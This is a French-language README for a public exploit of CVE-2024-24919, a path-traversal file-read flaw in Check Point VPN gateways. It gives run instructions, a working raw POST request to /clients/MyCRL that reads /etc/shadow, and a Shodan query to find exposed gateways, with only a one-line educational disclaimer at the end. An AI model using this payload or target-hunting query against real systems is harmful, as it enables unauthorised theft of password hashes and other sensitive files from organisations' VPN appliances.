
CVE-2024-24919 Exploit et PoC - LFI critique pour VPN d'accès distant ou accès mobile.
Ce dépôt contient un exploit Python pour la CVE-2024-24919, une vulnérabilité qui permet de lire des fichiers sensibles depuis la page vulnérable.
Cet exploit vérifie d'abord si la cible est vulnérable, puis récupère le chemin que vous spécifiez.
Sévérité: Critique
Clonez d'abord le dépôt :
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
Donnez les privilèges et exécutez l'exploit avec python3
chmod +x exploit.py
python3 exploit.py
Suivez ensuite les étapes et vous obtiendrez les données du fichier spécifié.
Si vous rencontrez des difficultés, assurez-vous que l'URL que vous spécifiez est l'URL principale.
✓ https://google.com
✘ https://google.com/search?client=firefox
Nous devons d'abord nous assurer que le site web possède des Check Point Security Gateways avec un accès VPN distant ou un logiciel d'accès mobile activé.
Dans cet exploit, nous pointons vers le point de terminaison {ip}/clients/MyCRL.
Ce point de terminaison est vulnérable si nous effectuons une requête POST, nous ajoutons la chaîne CSHELL/ et le chemin du fichier que nous voulons lire en utilisant un Path Traversal.
La requête ressemblera à ceci :
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
Nous obtenons tout cela en regardant le code source.
Pour plus d'informations sur le processus, consultez cet article --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Si vous souhaitez tester cette vulnérabilité, vous pouvez utiliser Sodan pour trouver des sites web vulnérables, en utilisant cette requête dans sodan
Server: "Check Point SVN Foundation"
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
Ce script est uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez l'autorisation d'accès.